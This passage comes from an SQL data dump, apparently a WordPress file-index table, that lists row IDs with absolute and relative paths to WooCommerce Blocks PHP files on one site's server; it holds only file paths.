src/BlockTypes/CheckoutShippingAddressBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingAddressBlock.php'),(10556,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingMethodBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingMethodBlock.php'),(10557,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingMethodsBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingMethodsBlock.php'),(10558,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutTermsBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutTermsBlock.php'),(10559,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutTotalsBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutTotalsBlock.php'),(10560,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ClassicTemplate.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ClassicTemplate.php'),(10561,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CustomerAccount.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CustomerAccount.php'),(10562,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/EmptyCartBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/EmptyCartBlock.php'),(10563,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/EmptyMiniCartContentsBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/EmptyMiniCartContentsBlock.php'),(10564,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedCategory.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedCategory.php'),(10565,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedItem.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedItem.php'),(10566,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedProduct.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedProduct.php'),(10567,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilledCartBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilledCartBlock.php'),(10568,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilledMiniCartContentsBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilledMiniCartContentsBlock.php'),(10569,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilterWrapper.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilterWrapper.php'),(10570,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/HandpickedProducts.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/HandpickedProducts.php'),(10571,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCart.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCart.php'),(10572,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartCartButtonBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartCartButtonBlock.php'),(10573,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartCheckoutButtonBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartCheckoutButtonBlock.php'),(10574,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartContents.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartContents.php'),(10575,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartFooterBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartFooterBlock.php'),(10576,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartItemsBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartItemsBlock.php'),(10577,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartProductsTableBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartProductsTableBlock.php'),(10578,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartShoppingButtonBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartShoppingButtonBlock.php'),(10579,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartTitleBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartTitleBlock.php'),(10580,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartTitleItemsCounterBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartTitleItemsCounterBlock.php'),(10581,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartTitleLabelBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartTitleLabelBlock.php'),(10582,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/PriceFilter.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/PriceFilter.php'),(10583,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProceedToCheckoutBlock.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProceedToCheckoutBlock.php'),(10584,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductAddToCart.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductAddToCart.php'),(10585,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductAverageRating.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductAverageRating.php'),(10586,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductBestSellers.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductBestSellers.php'),(10587,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductButton.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductButton.php'),(10588,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategories.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategories.php'),(10589,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategory.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategory.php'),(10590,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCollection.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCollection.php'),(10591,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductDetails.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductDetails.php'),(10592,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductGallery.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductGallery.php'),(10593,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductGalleryLargeImage.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductGalleryLargeImage.php'),(10594,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductGalleryLargeImageNextPrevious.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductGalleryLargeImageNextPrevious.php'),(10595,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductGalleryPager.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductGalleryPager.php'),(10596,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductGalleryThumbnails.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductGalleryThumbnails.php'),(10597,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductImage.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductImage.php'),(10598,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductImageGallery.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductImageGallery.php'),(10599,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductNew.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductNew.php'),(10600,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductOnSale.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductOnSale.php'),(10601,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductPrice.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductPrice.php'),(10602,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductQuery.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductQuery.php'),(10603,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductRating.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductRating.php'),(10604,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductRatingCounter.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductRatingCounter.php'),(10605,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductRatingStars.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductRatingStars.php'),(10606,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductResultsCount.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductResultsCount.php'),(10607,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductReviews.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductReviews.php'),(10608,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSKU.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSKU.php'),(10609,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSaleBadge.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSaleBadge.php'),(10610,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSearch.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSearch.php'),(10611,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductStockIndicator.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductStockIndicator.php'),(10612,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSummary.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSummary.php'),(10613,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTag.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTag.php'),(10614,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTemplate.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTemplate.php'),(10615,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTitle.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTitle.php'),(10616,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTopRated.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTopRated.php'),(10617,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductsByAttribute.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductsByAttribute.php'),(10618,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/RatingFilter.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/RatingFilter.php'),(10619,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/RelatedProducts.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/RelatedProducts.php'),(10620,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ReviewsByCategory.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ReviewsByCategory.php'),(10621,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ReviewsByProduct.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ReviewsByProduct.php'),(10622,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/SingleProduct.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/SingleProduct.php'),(10623,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/StockFilter.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/StockFilter.php'),(10624,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/StoreNotices.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/StoreNotices.php'),(10625,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypesController.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypesController.php'),(10626,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Bootstrap.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Bootstrap.php'),(10627,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Package.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Package.php'),(10628,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/CreateAccount.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/CreateAccount.php'),(10629,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/DraftOrders.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/DraftOrders.php'),(10630,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/Email/CustomerNewAccount.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/Email/CustomerNewAccount.php'),(10631,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/FeatureGating.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/FeatureGating.php'),(10632,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/GoogleAnalytics.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/GoogleAnalytics.php'),(10633,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/Hydration.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/Hydration.php'),(10634,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/Notices.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/Notices.php'),(10635,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/InboxNotifications.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/InboxNotifications.php'),(10636,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Installer.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Installer.php'),(10637,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Integrations/IntegrationInterface.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Integrations/IntegrationInterface.php'),(10638,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Integrations/IntegrationRegistry.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Integrations/IntegrationRegistry.php'),(10639,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/class-wc-interactivity-store.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/class-wc-interactivity-store.php'),(10640,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/load.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/load.php'),(10641,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/scripts.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/scripts.php'),(10642,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/store.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/store.php'),(10643,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Library.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Library.php'),(10644,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Migration.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Migration.php'),(10645,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Options.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Options.php'),(10646,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Package.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Package.php'),(10647,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Patterns/dictionary.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Patterns/dictionary.json'),(10648,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Api.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Api.php'),(10649,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/AbstractPaymentMethodType.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/AbstractPaymentMethodType.php'),(10650,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/BankTransfer.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/BankTransfer.php'),(10651,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/CashOnDelivery.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/CashOnDelivery.php'),(10652,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/Cheque.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/Cheque.php'),(10653,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/PayPal.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/PayPal.php'),(10654,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/PaymentMethodRegistry.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/PaymentMethodRegistry.php'),(10655,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/PaymentMethodTypeInterface.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/PaymentMethodTypeInterface.php'),(10656,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Registry/AbstractDependencyType.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Registry/AbstractDependencyType.php'),(10657,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Registry/Container.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Registry/Container.php'),(10658,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Registry/FactoryType.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Registry/FactoryType.php'),(10659,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Registry/SharedType.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Registry/SharedType.php'),(10660,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Shipping/PickupLocation.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Shipping/PickupLocation.php'),(10661,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Shipping/ShippingController.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Shipping/ShippingController.php'),(10662,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Authentication.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Authentication.php'),(10663,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/InvalidCartException.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/InvalidCartException.php'),(10664,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/InvalidStockLevelsInCartException.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/InvalidStockLevelsInCartException.php'),(10665,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/NotPurchasableException.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/NotPurchasableException.php'),(10666,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/OutOfStockException.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/OutOfStockException.php'),(10667,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/PartialOutOfStockException.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/PartialOutOfStockException.php'),(10668,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/RouteException.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/RouteException.php'),(10669,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/StockAvailabilityException.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/StockAvailabilityException.php'),(10670,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/TooManyInCartException.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Exceptions/TooManyInCartException.php'),(10671,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters/CurrencyFormatter.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters/CurrencyFormatter.php'),(10672,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters/DefaultFormatter.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters/DefaultFormatter.php'),(10673,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters/FormatterInterface.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters/FormatterInterface.php'),(10674,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters/HtmlFormatter.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters/HtmlFormatter.php'),(10675,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters/MoneyFormatter.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters/MoneyFormatter.php'),(10676,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Formatters.php'),(10677,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Legacy.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Legacy.php'),(10678,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Payments/PaymentContext.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Payments/PaymentContext.php'),(10679,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Payments/PaymentResult.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Payments/PaymentResult.php'),(10680,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerc